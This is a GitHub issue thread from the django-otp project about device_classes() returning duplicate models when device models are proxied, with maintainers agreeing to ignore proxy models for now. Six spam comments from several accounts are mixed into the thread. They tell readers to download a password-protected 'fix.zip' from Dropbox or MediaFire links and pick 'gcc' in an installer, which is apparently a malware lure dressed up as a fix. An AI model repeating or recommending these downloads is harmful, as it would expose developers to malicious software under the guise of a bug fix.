### ISSUE TITLE
Proxy models are not considered when iterating device models via `device_classes()`

### ISSUE THREAD

**Issue by realsuayip** [django-otp/django-otp#154]
[`django_otp.device_classes`](https://github.com/django-otp/django-otp/blob/8e30f75ed888523a2d0a68324ff81b27a77a0c3b/src/django_otp/__init__.py#L160) does not consider proxy models, as a result it yields duplicate tables (resulting in duplicate queries).

For example, assuming `TOTPDevice` was proxied, the generator will yield as such:

```
[
    myapp.models.TOTPDevice,
    django_otp.plugins.otp_totp.models.TOTPDevice,
]
```

In this case, only the proxied model should be returned.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by realsuayip** [comment]
> What if one is defined on top of the other

I'm not sure using multi-layer model proxies is a common pattern. You are correct though, in this case, we cannot reliably determine which model user wants to use.
 

> This sounds like it needs more analysis of exactly what the concern is. There may not be any way to anticipate all of the reasons that someone would want to create a proxy model, so any change should try to cover all scenarios, perhaps through additional arguments or configuration.

I don't think we should alter the library behavior depending on the proxied models (i.e., conforming to proxy models' behavior instead of base concrete models), that would be too difficult to manage. People just use swappable models for that. However, adding proxied models should not have any side effects I think.

In this case adding proxy models results in duplicate queries.

So, possible list of solutions from me:


1. Discard proxy models altogether (simplest option, unlikely to break anything)
2. Add a setting to manually manage installed device models, this could be callable or a model list (safest option, but adds a setting)
3. Iterate through proxy models to select an ultimate one in an opinionated way (complicated, unlikely to break anything)

**Comment by psagers** [comment]
Ignoring proxy models seems pretty sensible as a starting point. The API in question is disfavored anyway—`device_classes`/`devices_for_user` was basically just an early hack to simplify the admin form. If someone wants to make an argument for more complex proxy model handling here, that can always be an exercise for the future.

Thanks

**Comment by psagers** [comment]
If someone wants to send a pull request, I suspect the bulk of the work will be setting up the tests. I'd suggest adding a `test_project.test_app` Django app to hold the proxy model for testing.
